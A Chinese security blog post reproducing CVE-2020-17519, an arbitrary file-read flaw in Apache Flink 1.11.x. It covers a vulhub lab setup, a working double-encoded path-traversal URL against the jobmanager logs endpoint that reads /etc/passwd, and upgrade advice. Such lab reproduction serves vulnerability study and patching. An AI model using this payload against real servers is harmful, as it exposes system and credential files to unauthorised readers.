Apache Flink漏洞(CVE-2020-17519)复现

admin 2021年1月7日09:21:59评论154 views字数 607阅读2分1秒阅读模式

简介

 

Apache Flink是一个开源流处理框架,具有强大的流处理和批处理功能。

 

漏洞概述

 

Apache Flink 1.11.0中引入的一个更改(也在1.11.1和1.11.2中发布)允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。

 

影响版本


1.11.0、1.11.1、1.11.2


 

环境搭建


使用vulhub进行安装

Vulhub地址:

https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17519


启动Apache Flink jobmanager 1.11.2:进入目录cd vulhub-master/flink/CVE-2020-17519安装环境docker-compose up -d

Apache Flink漏洞(CVE-2020-17519)复现

然后访问http://your-ip:8081

Apache Flink漏洞(CVE-2020-17519)复现


漏洞复现


Poc

http://your-ip:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

Apache Flink漏洞(CVE-2020-17519)复现

读取成功

 

修复建议

 

升级到安全版本

安全版本:Flink 1.11.3Flink 1.12.0



本文始发于微信公众号(锋刃科技):Apache Flink漏洞(CVE-2020-17519)复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年1月7日09:21:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Apache Flink漏洞(CVE-2020-17519)复现https://cn-sec.com/archives/234399.html

发表评论

匿名网友 填写信息